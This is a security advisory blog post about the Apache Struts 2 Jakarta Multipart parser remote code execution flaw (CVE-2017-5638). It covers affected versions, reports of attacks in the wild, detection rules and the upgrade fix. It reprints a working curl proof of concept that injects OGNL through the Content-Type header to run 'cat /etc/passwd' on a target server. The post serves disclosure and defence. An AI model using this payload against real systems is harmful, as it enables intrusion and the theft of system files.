D’oh! Another Apache Struts 2 vulnerability!

Upgrade now, some attacks are already in progress!

Another serious vulnerability was discovered in Apache Struts 2.

Affected versions

Apache Struts 2.3.5–2.3.31
Apache Struts 2.5–2.5.10

The vulnerability

The vulnerability (CVE-2017–5638), firstly reported by the security researcher Nike Zheng, is a remote code execution bug that affects the Jakarta Multipart parser in Apache Struts, as reported in this security advisory:

It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn’t valid an exception is thrown which is then used to display an error message to a user.

The researchers have also seen malicious attacks which turn off firewall processes on the target and drop payloads:

“The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the bill gates botnet”.

Technical analysis was released by the major security firms:

Cisco’s Talos

Talos has also released some Snort rules that can detect exploitation attemps of the vulnerability(41818, 41819): https://snort.org/advisories/talos-rules-2017-03-07-3-7-2017.

Talos suggest to upgrade ASAP, because the researchers found

“a high number of exploitation events. The majority of the exploitation attempts seem to be leveraging a publicly released proof of concept that is being used to run various commands”.

The proof of concept was released by Qualys.

Qualys

Apache Struts Jakarta Multipart Parser Remote Code Execution Vulnerability

Qualsys releases the proof-of-concept that can check the vulnerability using CURL:

For our analysis, we have used below curl command to replicate the issue:

curl -i -v -s -k -X $'GET' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0' -H $'Content-Type:%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}' $'http://10.10.36.22:8080/struts2-blank/example/HelloWorld.action'

It is important to note that the presence of vulnerable code is enough to exploit the vulnerability. The web application doesn’t necessary need to implement file upload functionality to exploit this vulnerability.

On Rapid7 GitHub repository is also available a python script to check the vulnerability:

https://github.com/rapid7/metasploit-framework/issues/8064

Remediations?

This vulnerability has been fixed Struts 2.3.32 and 2.5.10.1, so…upgrade ASAP!

Comments